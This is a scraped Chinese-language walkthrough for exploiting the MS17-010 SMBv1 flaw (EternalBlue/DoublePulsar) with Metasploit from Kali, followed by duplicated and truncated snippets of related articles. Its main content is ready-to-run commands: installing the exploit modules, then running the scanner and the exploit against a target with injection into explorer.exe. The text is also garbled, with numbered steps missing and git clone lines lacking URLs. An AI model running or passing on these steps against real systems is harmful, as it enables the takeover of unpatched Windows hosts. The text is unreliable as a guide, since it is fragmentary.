1、公升級kali-rolling
a、修改更新源 vim /etc/apt/sources.list,只保留官方更新源「deb kali-rolling main non-free contrib」將其他更新源注釋掉;
b、更新 apt-get update && apt-get upgrade
git clone
攻擊模組:
git clone
將攻擊模組解壓,並將deps資料夾和eternalblue_doublepulsar.rb拷貝至/root/.msf/modules/exploits/windows/smb中;將掃瞄模組smb_ms17_010.rb拷貝至/root/.msf/modules/auxiliary/scanner/smb/中。
4、開啟msf
msfconsole
msfupdate
5、載入掃瞄模組並設定
use auxiliary/scanner/smb/smb_ms17_010
set rhosts ***.***.***.***
run6、載入攻擊模組
use exploits/windows/smb/eternalblue_doublepulsar
set rhost ***.***.***.***
set processinject explorer.exe
run
微軟EternalBlue永恆之藍漏洞攻擊測試
微軟ms17 010 理論 smbv1 漏洞攻擊,445埠。攻擊資源 攻擊工具包 點我 攻擊者系統 windows 7 ultimate x64 點我 受害者系統 windows 7 ultimate x64 點我,winxp,win2008,win2003均可。點我 輔助攻擊用系統 kali 點我...
微軟EternalBlue永恆之藍漏洞攻擊測試
微軟ms17 010 理論 smbv1 漏洞攻擊,445埠。攻擊資源 攻擊工具包 點我 攻擊者系統 windows 7 ultimate x64 點我 受害者系統 windows 7 ultimate x64 點我,winxp,win2008,win2003均可。點我 輔助攻擊用系統 kali 點我...
內網滲透(msf 永恆之藍漏洞)
準備工具 一台kall虛擬機器 擁有msf 一台win7虛擬機器 先使用msf的永恆之藍掃瞄模組對區域網進行掃瞄,可以掃瞄出區域網內符合條件的計算機資訊。這裡先推薦用nmap掃瞄區域網的存活機後,直接指定ip掃瞄把,用這個模板直接掃瞄整個區域網實在是太浪費時間了。在掃瞄出有著永恆之藍漏洞的計算機後,...